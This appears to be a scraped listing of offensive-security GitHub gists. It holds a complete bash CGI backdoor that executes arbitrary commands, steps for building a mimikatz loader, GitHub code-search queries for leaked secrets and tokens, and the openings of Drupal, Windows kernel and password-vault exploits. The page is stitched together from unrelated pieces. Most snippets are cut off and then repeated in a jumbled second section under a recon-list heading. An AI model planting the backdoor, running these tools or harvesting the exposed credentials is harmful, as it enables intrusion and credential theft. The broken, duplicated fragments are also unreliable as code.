xer0dayz 1N3

## gist:38dcff6a0975f148aa858e924d64c492
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi


## extensions_temp_backup.txt
.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache

## Steps.txt
 1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases

 2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a

 3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.

 4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.

 6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"


## auto_git_query
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

## cve-2019-6340.py
#!/usr/bin/env python3

# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza

# Technical details for this exploit is available at:
#   https://www.drupal.org/sa-core-2019-003
#   https://www.ambionics.io/blog/drupal8-rce
#   https://twitter.com/jcran/status/1099206271901798400

## getValidDNS.sh
if [ "$#" -eq 0 ] || [ "$#" -gt 2 ] || [[ $* == *--help* ]] || [[ $* == *-h* ]]; then
    echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]"
    exit 1
fi


## akagi_49a.c
typedef struct tagCREATELINKDATA {
    ULONG  dwFlags;
    WCHAR szLinkName[MAX_PATH];     // + 0x20C
    WCHAR szExeName[MAX_PATH];      // + 0x414
    WCHAR szParams[MAX_PATH];       // + 0x61C
    WCHAR szWorkingDir[MAX_PATH];   // + 0x824
    WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
    WCHAR szExpExeName[MAX_PATH];   // + 0xC34
    WCHAR szProgDesc[MAX_PATH];     // + 0xE3C
    WCHAR szFolder[MAX_PATH];       // + 0x1044

## password_vault_exploit.js
//Exploit Code by Shawar Khan

var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {

    // Holds the records in as String
    var allrecords = data;

    // converting response to JSON

## WCTF_2018_searchme_exploit.cpp
// WCTF 2018 "searchme" task exploit
//
// Author:    Mateusz "j00ru" Jurczyk
// Date:      6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also:  https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>

## a-recon-services-list-for-liveoverflow.md

      
              2 files
            
          
              15 forks
            
          
              0 comments
            
          
              36 stars
            
          
                EdOverflow
                / a-recon-services-list-for-liveoverflow.md
            
            
              Last active
              April 29, 2021 13:29
            
          
https://scans.io/
https://commoncrawl.org/
https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
https://www.shodan.io/
https://opendata.rapid7.com/
https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
https://securitytrails.com/
https://threatcrowd.org/
https://dnsdumpster.com/
https://crt.sh/
	cd /tmp
	mkdir cgi-bin
	echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
	echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
	echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
	chmod +x ./cgi-bin/backdoor.cgi
	python -m http.server --cgi
	1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases

	2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a

	3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.

	4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.

	6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
	https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
	https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
	https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
	https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
	https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
	#!/usr/bin/env python3

	# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
	# 2019 @leonjza

	# Technical details for this exploit is available at:
	# https://www.drupal.org/sa-core-2019-003
	# https://www.ambionics.io/blog/drupal8-rce
	# https://twitter.com/jcran/status/1099206271901798400
	if [ "$#" -eq 0 ] \|\| [ "$#" -gt 2 ] \|\| [[ $* == --help ]] \|\| [[ $* == -h ]]; then
	echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]"
	exit 1
	fi
	typedef struct tagCREATELINKDATA {
	ULONG dwFlags;
	WCHAR szLinkName[MAX_PATH]; // + 0x20C
	WCHAR szExeName[MAX_PATH]; // + 0x414
	WCHAR szParams[MAX_PATH]; // + 0x61C
	WCHAR szWorkingDir[MAX_PATH]; // + 0x824
	WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
	WCHAR szExpExeName[MAX_PATH]; // + 0xC34
	WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
	WCHAR szFolder[MAX_PATH]; // + 0x1044
	//Exploit Code by Shawar Khan

	var data_chunks = '';
	// Capturing Records from API
	fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {

	// Holds the records in as String
	var allrecords = data;

	// converting response to JSON
	// WCTF 2018 "searchme" task exploit
	//
	// Author: Mateusz "j00ru" Jurczyk
	// Date: 6 July 2018
	// Tested on: Windows 10 1803 (10.0.17134.165)
	//
	// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
	#include <Windows.h>
	#include <winternl.h>
	#include <ntstatus.h>